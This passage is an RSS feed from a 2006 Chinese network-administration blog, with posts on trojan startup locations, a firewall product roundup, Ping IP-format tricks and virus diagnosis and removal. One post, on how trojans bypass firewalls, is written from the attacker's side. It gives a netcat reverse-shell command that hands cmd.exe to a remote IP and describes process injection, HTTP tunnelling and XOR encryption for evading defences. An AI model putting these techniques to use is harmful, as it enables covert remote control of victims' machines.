/>HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer <br /><br />ShellFoldersStartup="C:windowsstartmenuprogramsstartup"。要注意经常检查启动组哦！ <br /><br />8、隐蔽在Winstart.bat中 <br /><br />按照上面的逻辑理论，凡是利于木马能自动加载的地方，木马都喜欢呆。这不，Winstart.bat也是一个能自动被Windows加载运行的文件，它多数情况下为应用程序及Windows自动生成，在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Winstart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。 <br /><br />9、捆绑在启动文件中 <br /><br />即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。 <br /><br />10、设置在超级连接中 <br /><br />木马的主人在网页上放置恶意代码，引诱用户点击，用户点击的结果不言而喻：开门揖盗！奉劝不要随便点击网页上的链接，除非你了解它，信任它，为它死了也愿意等等</font>
		</span>
		<br />
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21173.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-27 15:13 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/27/21173.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>世界上最优秀的二十款防火墙简介</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21050.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Sun, 24 Dec 2006 07:53:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21050.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21050.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21050.html#Feedback</comments><slash:comments>7</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21050.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21050.html</trackback:ping><description><![CDATA[
		<div>世界上最优秀的二十款防火墙简介<br /><br />1.ZoneAlarm（ZA）——强烈推荐◆◆◆◆◆<br /><br />这是Zone Labs公司推出的一款防火墙和安全防护软件套装，除了防火墙外，它包括有一些个人隐私保护工具以及弹出广告屏蔽工具。与以前的 版本相比，新产品现在能够支持专家级的规则制定，它能够让高级用户全面控制网络访问权限，同时还具有一个发送邮件监视器，它将会 监视每一个有可能是由于病毒导致的可疑行为，另外，它还将会对网络入侵者的行动进行汇报。除此之外，ZoneAlarm Pro 4.5还保留了前几个版本易于使用的特点，即使是刚刚出道的新手也能够很容易得就掌握它的使用。 <br /><br />说明： <br /><br />1、安装程序会自动查找已安装的 ZoneAlarm Pro 路径。 <br /><br />2、如果已经安装过该语言包，再次安装前请先退出 ZA。否则安装后需要重新启动。 <br /><br />2、若尚未安装 ZA，在安装完 ZA 后进行设置前安装该语言包即可，这样以后的设置将为中文界面。 <br /><br />3、ZA 是根据当前系统的语言设置来选择相应语言包的，如果系统语言设置为英文，则不会调用中文语言包。 <br /><br />4、语言包不改动原版任何文件，也适用于和 4.5.594.000 相近的版本。如果需要，在卸载后可还原到英文版。 <br /><br />5、有极少量英文资源在语言包里没有，故无法汉化。如检查升级时的提示窗口、警报信息中的“Port”。<br /><br />2.傲盾（KFW）——强烈推荐◆◆◆◆◆<br /><br />本软件是具有完全知识版权的防火墙，使用了目前最先进的第三代防火墙技术《DataStream Fingerprint Inspection》数据流指纹检测技术，与企业级防火墙Check Point和Cisco相同，能够检测网络协议中所有层的状态，有效阻止DoS、DDoS等各种攻击，保护您的服务器免受来自I nternet上的黑客和入侵者的攻击、破坏。通过最先进的企业级防火墙的技术，提供各种企业级功能，功能强大、齐全，价格低廉 ，是目前世界上性能价格比最高的网络防火墙产品。<br /><br />3.Kaspersky Anti-Hacker（KAH）——一般推荐◆◆◆◆ <br /><br />Kaspersky Anti-Hacker 是Kaspersky 公司出品的一款非常优秀的网络安全防火墙！和著名的杀毒软件 AVP是同一个公司的作品！保护你的电脑不被黑客攻击和入侵，全方位保护你的数据安全！所有网络资料存取的动作都会经由它对您产 生提示，存取动作是否放行，都由您来决定，能够抵挡来自于内部网络或网际网络的黑客攻击！ <br /><br />4.BlackICE◆◆◆<br /><br />该软件在九九年获得了PC Magazine 的技术卓越大奖，专家对它的评语是：“对于没有防火墙的家庭用户来说，BlackICE是一道不可缺少的防线；而对于企业网络， 它又增加了一层保护措施--它并不是要取代防火墙，而是阻止企图穿过防火墙的入侵者。BlackICE集成有非常强大的检测和分析引擎，可以识别200 多种入侵技巧，给你全面的网络检测以及系统防护，它还能即时监测网络端口和协议，拦截所有可疑的网络入侵，无论黑客如何费尽心机 也无法危害到你的系统。而且它还可以将查明那些试图入侵的黑客的NetBIOS(WINS)名、DNS名或是他目前所使用的IP 地址记录下来，以便你采取进一步行动。封言用过后感觉，该软件的灵敏度和准确率非常高，稳定性也相当出色，系统资源占用率极少， 是每一位上网朋友的最佳选择。 <br /><br />新增功能： <br /><br />1.在设置中增加了应用程序与通信控制的功能条 <br /><br />2.可控制应用程序是否在电脑上执行 <br /><br />3.可控制哪些应用程序能与Internet通讯 <br /><br />4.扫描你的系统，检测所有的系统设置改变 <br /><br />5.可在事件列表中记录新软件与新通讯事件的发生情况<br /><br />5.Agnitum Outpost Firewall（AOFW）◆◆◆<br /><br />Agnitum Outpost Firewall 是一款短小精悍的网络防火墙软件，它的功能是同类PC软件中比较强大的，甚至包括了广告和图片过滤、内容过滤、DNS缓存等功能 。它能够预防来自Cookies、广告、电子邮件病毒、后门、窃密软件、解密高手、广告软件和其它 Internet 危险的威胁。该软件不需配置就可使用，这对于许多新手来说，变得很简单。尤为值得一提的是，这是市场上第一个支持插件的防火墙， 这样它的功能可以很容易地进行扩展。该软件资源占用也很小。 Outpost的其它强大功能毋庸多说，你亲自试一试就知道了。 <br /><br />6.XELIOS Personal Firewall（XFW）◆◆<br /><br />体积小巧，但功能强大的个人网络防火墙软件。能够有效的抵御黑客和木马的攻击，具有强大的自定义 IP 过滤规则功能。<br /><br />7.LockDown Millennium（LDM）——一般推荐◆◆◆◆<br /><br />最棒的网络安全工具！能够清除目前所有的木马，能查出未知木马，能杀邮件病毒，能防止网络炸弹攻击，能在线检测所有对本机的访问 并控制它们，能跟踪入侵者，留下它的罪证……简直就是本机防火墙，也许比它还强？ <br /><br />8.Intruder ALART 99——强烈推荐◆◆◆◆◆<br /><br />LockDown 2000 能防黑客程序, 能防一些常规的攻击如 Ne <br /><br />tBus, SubSeven... The Cleaner能清除黑客程序并阻止它的运行.但是面对新的黑客软件的现身, 如 冰河... $C (共享 C 盘等自制黑客软件) 等等... 它已经力不从心.Intruder ALART 99就防住任何对你的攻击! <br /><br />9.The Cleaner◆◆<br /><br />一个专门检测和清除侵入您系统中的特洛伊木马的专业程序, 内置4789个木马标识。可在线升级版本和病毒数据库, 作简单, 功能强大! 查杀的各类特洛伊木马种类最多，几乎所有较出名的这里都有，如 Netspy、BO、Netbus、 Girlfriend、Happy99、BackDoor 以及它们的一些不同版本。还有很多种我们大多数网友听都没听过，有了它我们可以将电脑“清洁”得干干净净，放心大胆地上网。 <br /><br />10.Kerio Personal Firewall （KFW）——一般推荐◆◆◆◆<br /><br />Kerio Personal Firewall 采用了专业的防黑技术，可以确保你的计算机不被任何黑客侵扰，资源占用极少，支持 MD5 文件校验，支持远程管理。 对个人用户完全免费，商业用途则是30天试用。 <br /><br />11.Sygate Personal Firewall（SFW)◆◆<br /><br />Sygate Personal Firewall 是一个简单易用的个人防火墙，适合于那些网络中的单机用户来防止入侵者非法进入系统。作为一个基于主机的解决方案，该软件提供了 多层保护的防火墙安全环境，可以有效地防止入侵者和黑客的侵袭。与真正的防火墙不同的是，Sygate Personal Firewall 能够从系统内部进行保护，并且可以在后台不间断地运行。另外，该软件还提供有安全访问和访问监视功能，并可向你提供所有用户的活 动报告，当检测到入侵和不当的使用后，能够立即发出警报。 <br /><br />12.天网防火墙——强烈推荐!◆◆◆◆◆<br /><br />天网防火墙个人版是一款由天网安全实验室制作的给个人电脑使用的网络安全程序。它根据系统管理者设定的安全规则把守网络，提供强 大的访问控制、应用选通、信息过滤等功能。它可以帮你抵挡网络入侵和攻击，防止信息泄露，并可与天网安全实验室的网站相配合，根 据可疑的攻击信息，来找到攻击者。<br /><br />13.瑞友RSA防火墙◆◆ <br /><br />RSA迷你版是由西安瑞友信息技术资讯有限公司所出的Real Secureity &amp; Acceleration Server防火墙的精简体验版，其包含RSA Server的部分精简功能，适合于小型企业、办公、学校、网吧等小型局域网的网络安全和线路共享。 <br /><br />RSA迷你版是取代目前各种代理服务器的最佳选择，她除了具有传统代理服务器的所有功能以外，还是一个集各种网络服务功能为一身 的状态检测防火墙，她让您可以共享一条线路通过代理方式或者NAT地址转换方式，并且集成了DHCP、DNS等网络服务，支持常 见的各种接入方式ADSLISDNModem以太网光纤等。 <br /><br />您还可以将她取代个人防火墙安装在个人PC上起到比个人防火墙强大百倍的效果。保证您的PC机永不受攻击性病毒或者黑客的骚扰。 <br /><br />RSA防火墙还具有以下性能特点： <br /><br />1. 独一无二的路由加速功能 <br /><br />2. 坚固的防火墙能力 <br /><br />3. 稳定的网关性能 <br /><br />4. 内置DHCP服务，DNS中继 <br /><br />5. 独创的网络安全锁功能 <br /><br />6. 强大的网络抗干扰能力 <br /><br />7. 保证您的局域网私人资料处于安全的状态。 <br /><br />8. 提供网络实时过滤监控功能。 <br /><br />9. 防御各种木马和蠕虫病毒的恶意攻击，如冲击波、振荡波、BO、冰河。 <br /><br />10. 防御ICMP、IGMP洪水攻击、IGMP NUKE攻击及IGMP碎片攻击。 <br /><br />11. 防御诸如WinNuke、IpHacker之类的OOB攻击。 <br /><br />软件安装使用简单，设置选项明了，采用独特的界面设计，豪华与朴实相结合，个性化的选择，给您以美的享受。是应用于小型局域网共 享和安全防护的最佳选择！ <br /><br />14.反黑精英(Trojan Ender)——一般推荐◆◆◆◆<br /><br />反黑精英( 原名 Trojan Ender ) 推出短短不到二个月即受到广大用户的好评！木马、QQ盗号软件、传奇盗号软件等各种黑客程序的真正克星！查杀速度最快，准确率最 高，杀除最细致! 各种辅助工具使用简单而功能强大! <br /><br />查杀速度又获大幅提升！新增分析扫描功能，可查未知木马！木马、QQ盗号软件、传奇盗号软件等各种黑客程序一杀无遗！查杀全面准 确，速度超快，使用简单方便，运行稳定，界面美观！可自动修复被破坏的注册表键值！支持对压缩文件的扫描，并可轻松查杀捆绑式木 马、无进程木马！系统优化器提高您的系统运行效率！IE修复器轻松修复恶意网页的破坏！<br /><br />15.诺顿网络安全特警（中文版）——强烈推荐◆◆◆◆◆ <br /><br />诺顿网络安全特警2004 简体中文零售版，10月21日发布，无缝集成防病毒、个人防火 <br /><br />墙、隐私控制、反垃圾邮件、父母控制等功能，可以确保您收发电子邮 件，网上购物，在线理财安全无忧。安装本软件之前请先卸载旧版本。支持自安装日起一年内在线升级。 <br /><br />诺顿网络安全特警2004以其全面的防护功能，高度的集成性和易用性荣获了个人电脑杂志编辑选择奖。它不仅可以防御病毒，还新增 了对间谍程序，击键记录程序等非病毒性威胁的防护，保护您的密码等隐私信息不会被泄露出去；防火墙功能考虑到笔记本电脑用户经常 变换网络的情况，可以根据不同的网络自动切换网络安全配置，使移动用户不会因为忘记改变安全配置而产生安全隐患；反垃圾邮件功能 通过多种垃圾邮件过滤机制能够使您基本摆垃圾邮件的侵扰；父母控制功能可以为每个家庭成员设置不同的网络使用权限，并且禁止某 些未成年人不宜的网上内容和网站，为您的家庭提供一个健康愉快的网络环境；总之，诺顿网络安全特警2004为个人用户提供了功能 全面 <br /><br />诺顿网络安全特警2004升级服务包括对下列内容的实时更新：病毒定义、病毒扫描引擎、防火墙规则、入侵检测特征、最新发现系统 漏洞、垃圾邮件定义、内容过滤信息。 <br /><br />警告：如牵涉到版权请试用后24小时内删除，如满意请付费作者继续使用。<br /><br />16.PestPatrol Corporate Edition◆◆◆<br /><br />最好的企业电脑预防保护软件，全面预防来自黑客工具的威胁，特洛伊木马、键盘监视工具，拒绝代理服务器攻击；全面检查所有文件或 指定文件；扫描内存并清除病毒；检查并移动在注册表和运行的病毒；自动防止spyware进入电脑；详细的日志；隔离和删除确定 病毒；支持在线升级；全面兼容其它杀毒软件防火墙。该版本在以前版本的基础上添加了一个连接、搜索标签，可以直接跟踪流行的恶意 软件信息发布网页。 <br /><br />17.F-Secure——强烈推荐!◆◆◆◆◆<br /><br />欧洲最好的防火墙,在2003年底,F-SECURE被评为2003 TOP TEN排名第一。该防火墙的特点是利用系统资源少,对系统作没有任何影响.如果你还在用什么金山什么NORTON,KV,或者 迈开非,我建议你现在就可以删除了.在欧洲多数的学校和公司都采用F-SECURE的防火墙。 <br /><br />18.McAfee Desktop Firewall——一般推荐◆◆◆◆<br /><br />能够对客户端进行前瞻性的保护和控制，使其免受新威胁的攻击，这是单纯的防病毒产品无法实现的。 Desktop Firewall 针对网络和应用程序提供了全面的防火墙功能，并与入侵检测技术完美结合。 它可以防止客户端发送或接收非法网络流或应用程序中所携带的恶意攻击。 它还可以防止合法应用程序被入侵者利用，进而在整个网络中发送或接收攻击信息。 McAfee ePolicy Orchestrator 为 Desktop Firewall 提供了可扩展的集中式管理、部署和报告功能。 此外，Desktop Firewall 能够与 McAfee VirusScan Enterprise 和 ePolicy Orchestrator 进行集成，从而提供了无可比拟的客户端安全性和投资回报率。 <br /><br />19.Tiny Personal Firewall◆◆<br /><br />这是一个全面，却又简单易用的网络防黑软件，可以管理本机与网络的数据交换，通过设置不同的安全规则，阻挡任何未经认证的用户进 入你的计算机，可以防止特洛依木马、间谍软件、网络蠕虫通过计算机窃取发送数据，支持MD5签名认证，这样可以防止trojan 使用计算机认可的应用程序来闯入计算机，还可以和不同的VPN技术如Cisco、Alcatel、Nortel整合一起。 <br /><br />20.瑞星防火墙——强烈推荐！◆◆◆◆◆<br /><br />1、保护网络安全，免受黑客攻击。 <br /><br />2、采用增强型指纹技术，有效的监控网络连接。 <br /><br />3、内置细化的规则设置，使网络保护更加智能。 <br /><br />4、游戏防盗、应用程序保护等高级功能，为个人电脑提供全面安全保护。 <br /><br />5、通过过滤不安全的网络访问服务，极大地提高了用户电脑的上网安全。 <br /><br />6、彻底阻挡黑客攻击、木马程序等网络危险，保护上网帐号、QQ密码、网游帐号等信息不被窃取。</div>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21050.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-24 15:53 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21050.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>解析木马如何穿过你的防火墙？</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21049.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Sun, 24 Dec 2006 07:52:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21049.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21049.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21049.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21049.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21049.html</trackback:ping><description><![CDATA[
		<div>解析木马如何穿过你的防火墙？<br /><br />网络不太平,谁上网都会架起个firewall来防护网络攻击<br />这岂不是给我们木马的生存带来了巨大挑战?<br />物竞天择,适者生存,嗯...要想生存下去就要穿墙! Bypass Firewall:<br /><br />1.首先就是No Firewall(允许本地对外监听基本上任何端口),没有防火墙?(这不是废话?)<br />对付这种机器好办,随便哪个马一般都行<br />典型代表 Radmin(其实它不是马,用的人多了,也就变成了马,无辜)<br />rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?)<br /><br />2.端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了)<br />道高一尺,魔高一丈.:<br />    你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)<br />使用工具netcat就可以穿刺这种防火墙 : <br />    nc -e cmd.exe 远程ip 远程监听port   <br />    将会反弹一个cmdshell给远程ip主机控制,,这种方式好就好在可以控制没有公网ip的受害主机.<br /><br />    随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等<br />典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac )<br />    还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)<br />典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制)<br />    更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信,你防火墙能把我怎么样?哈哈<br />典型的如ntrootkit采用了自定义协议技术.<br /><br />3.应用程序筛选.(只允许特定程序访问网络)<br />    木马也不甘落后,自己不能访问网络,只好寄人篱下:<br />    进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入<br />现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等.<br /><br />4.协议筛选.<br />(例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-)<br />怎么办? 暗渡陈仓, 挖隧道: http-tunnel (http隧道)将木马通信封装成http数据报进行传输.<br />使用这种技术的有pcshare(使用双向http隧道传输)<br /><br />5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了:<br />比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去!<br />可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵<br /><br />6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密.<br /><br />但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用.<br />同时,综合利用以上对抗技术的木马也不鲜见了.<br />木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展.呵呵</div>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21049.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-24 15:52 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/24/21049.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>黑客系列知识之不要小看了ping命令</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/22/20981.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Fri, 22 Dec 2006 11:31:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/22/20981.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/20981.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/22/20981.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/20981.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/20981.html</trackback:ping><description><![CDATA[
		<p style="TEXT-INDENT: 2em">Ping命令，大家都比较熟悉，它常被用来测试局域网的连通状态。“Ping+IP地址”是大家最常用的一种命令格式，但大家是否注意过Ping命令中的IP地址呢?这里面可是有很多学问和讲究的，下面笔者就为大家介绍一下隐藏在Ping命令中的这些秘密。 </p>
		<p style="TEXT-INDENT: 2em">
				<b>“.0”可以有条件省略</b>
		</p>
		<p style="TEXT-INDENT: 2em">大家常用“ping 127.0.0.1”命令在本机上做回路测试，用来验证本机的TCP/IP协议簇是否被正确安装。但你发现了吗?使用“ping 127.1”这个命令也能得到同样的测试结果(如图)，其实“ping 127.1”和“ping 127.0.0.1”这两条命令是一样的，都是在进行回路测试。 </p>
		<p style="TEXT-INDENT: 2em">为什么会这样呢?这就是Ping命令应用中IP地址的使用技巧。大家都知道，IP地址由32位二进制数字组成，为了方便大家记忆，将每8位二进制数字换算成十进制数字，因此就形成了容易记忆的由四部分十进制数字组成的IP地址(如127.0.0.1)。由于，<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">Windows</a><a href="http://zhyafei.blog.xunlei.com" target="_blank">操作系统</a>具有自动填充 “.0”的功能，因此我就可将“127.0.0.1”变为“127.1”。 </p>
		<p style="TEXT-INDENT: 2em">但是，这个“.0”的省略是有条件限制的，并不能任意省略。在Ping命令的应用中，只能将在IP地址的最后一部分十进制数字前出现的一个或多个“.0”省略，如把“ping 127.0.0.1”命令改写成“ping 127.1”。 </p>
		<p style="TEXT-INDENT: 2em">如果这一个或多个 “.0”没有紧挨着最后一部分的十进制数字，而是在其他位置，则这个“.0”不能省略，如“ping 202.0.96.1”就不能写成“ping 202.96.1”。这是因为“ping 202.96.1”返回的结果是“202.96.0.1”的应答信息，而不是“202.0.96.1”的应答信息。 </p>
		<p style="TEXT-INDENT: 2em">
				<b>数字串代替IP地址</b>
		</p>
		<p style="TEXT-INDENT: 2em">在Ping命令中，还可以使用数字串代替IP地址，你相信吗?运行“ping 3658906394”命令，你会看到“218.22.123.26”这个IP地址的返回信息。 </p>
		<p style="TEXT-INDENT: 2em">为什么会这样呢?其实，“3658906394”就是IP地址“218.22.123.26”的另一种表示形式。当然，也可按同样的方法Ping其他的IP地址。 </p>
		<p style="TEXT-INDENT: 2em">字符串是如何转换而来的呢?其实并不复杂，以“218.22.123.26”这个IP地址为例，IP地址转换成数字串方法如下:先将 “218.22.123.26”转换为十六进制“DA.16.7B.1A”，然后去掉小数点后，变为“DA167B1A”，最后将这个十六进制数转换为十进制“3658906394”，那么“218.22.123.26”就变为“3658906394”了。其他IP地址转换为数字串也是使用同样的方法。 </p>
		<p style="TEXT-INDENT: 2em">提示:在某些局域网环境中，使用“Ping+数字串”命令可能会失败，出现提示信息“Unknown host数字串”，这是因为该数字串被解析成主机名了，而不是IP地址。 </p>
		<p style="TEXT-INDENT: 2em">因此，掌握了上述技巧后，<a href="http://zhyafei.blog.xunlei.com" target="_blank">网管</a>在进行网络测试或维护时，可以熟练运用“省略”方式，减轻Ping命令的字符输入量，提高工作效率。同时，使用数字串代替IP地址也可迷惑好奇心强的普通用户，以免他们胡乱设置。</p>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/20981.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-22 19:31 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/22/20981.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>电脑中毒后的一些表现及其中毒诊断</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20816.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Tue, 19 Dec 2006 11:24:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20816.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/20816.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20816.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/20816.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/20816.html</trackback:ping><description><![CDATA[
		<div class="ContentFont" id="NewaspContentLabel" style="DISPLAY: block; PADDING-BOTTOM: 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; PADDING-TOP: 0px">
				<font id="font_word" style="FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif; FONT-SIZE: 14px">
						<p>网络时代，病毒已经无所不在。在层出不穷、变化多端的病毒袭击下，中招基本上是不可避免的了。那么中招以后我们改如何处理(当然必须处理，否则计算机没法替你工作)?是格式化系统然后重装<a class="wordstyle" href="http://zhyafei.blog.xunlei.com" target="_blank">windows</a>，还是请人帮忙……。因为职业关系，我不得不与这些让人讨厌的东西战斗着，逐步地积累了一些行之有效的办法，供大家参考。</p>
						<p>
								<b>一、中毒的一些表现</b>
						</p>
						<br />
						<p>　　我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样，总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开，电脑不能正常启动、硬盘分区找不到了、数据丢失等等，就是中毒的一些征兆。</p>
						<p>　　<b>二、中毒诊断</b></p>
						<p>　　1、按Ctrl+Shift+Ese键(同时按此三键)，调出<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">windows</a>任务管理器查看系统运行的进程，找出不熟悉进程并记下其名称(这需要经验)，如果这些进程是病毒的话，以便于后面的清除。暂时不要结束这些进程，因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态，如果CPU的利用率接近100%或内存的占用值居高不下，此时电脑中毒的可能性是95%.</p>
						<p>　　2、查看<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">windows</a>当前启动的服务项，由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言，正常的<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">windows</a>服务，基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外)，此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称，假如其名称和路径为C：winntsystem32explored.exe，计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边，中间有一纵向的滚动条，而右边为空白，再双击添加/删除程序或管理工具，窗体内是空的，这是病毒文件winhlpp32.exe发作的特性。</p>
						<p>　　3、运行注册表编辑器，命令为regedit或regedt32，查看都有那些程序与<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">windows</a>一起启动。主要看Hkey_Local_MachineSoftwareMicroSoft<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">Windows</a>CurrentVersionRun和后面几个RunOnce等，查看窗体右侧的项值，看是否有非法的启动项。<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">Windows</a>Xp运行msconfig也起相同的作用。随着经验的积累，你可以轻易的判断病毒的启动项。</p>
						<p>　　4、用浏览器上网判断。前一阵发作的Gaobot病毒，可以上yahoo.com，sony.com等网站，但是不能访问诸如www.symantec.com，www.ca.com这样著名的安全厂商的网站，安装了symantecNorton2004的杀毒软件不能上网升级。</p>
						<p>　　5、取消隐藏属性，查看系统文件夹winnt(<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">windows</a>)system32，如果打开后文件夹为空，表明电脑已经中毒;打开system32后，可以对图标按类型排序，看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks，wins，drivers.目前有的病毒执行文件就藏身于此;driversetc下的文件hosts是病毒喜欢篡改的对象，它本来只有700字节左右，被篡改后就成了1Kb以上，这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。</p>
						<p>　　6、由杀毒软件判断是否中毒，如果中毒，杀毒软件会被病毒程序自动终止，并且手动升级失败……杀毒、建议</p>
						<p>　　<b>三、杀毒</b></p>
						<p>　　1、在注册表里删除随系统启动的非法程序，然后在注册表中搜索所有该键值，删除之。当成系统服务启动的病毒程序，会在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身，找到之后一并消灭。</p>
						<p>　　2、停止有问题的服务，改自动为禁止。</p>
						<p>　　3、如果文件system32driversetchosts被篡改，恢复它，即只剩下一行有效值“127.0.0.1localhost”，其余的行删除。再把host设置成只读。</p>
						<p>　　4、重启电脑，摁F8进“带网络的安全模式”。目的是不让病毒程序启动，又可以对<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">Windows</a>升级打补丁和对杀毒软件升级。</p>
						<p>　　5、搜索病毒的执行文件，手动消灭之。</p>
						<p>　　6、对<a class="wordstyle" href="http://zhyafei.blog.xunlei.com/" target="_blank">Windows</a>升级打补丁和对杀毒软件升级。</p>
						<p>　　7、关闭不必要的系统服务，如remoteregistryservice. 8、第6步完成后用杀毒软件对系统进行全面的扫描，剿灭漏网之鱼。</p>
						<p>　　9、上步完成后，重启计算机，完成所有操作。</p>
						<p>　　<b>四、建议</b></p>
						<p>　　防范病毒作用远甚于查杀病毒。因此建立严密的防范措施是十分必要的。在具备条件的大中型网络里，应该软硬兼施、立体防护。理想得到情况是：Internet的接入处是外网防火墙;紧接着是防毒网关(熊猫卫士的性价比较高);然后是路由器，服务器区，可为应用服务器配置一台病毒服务器;再往内是内网防火墙;内网架设杀毒服务器，每个用户都安装杀毒软件的可管理客户端。</p>
				</font>
		</div>
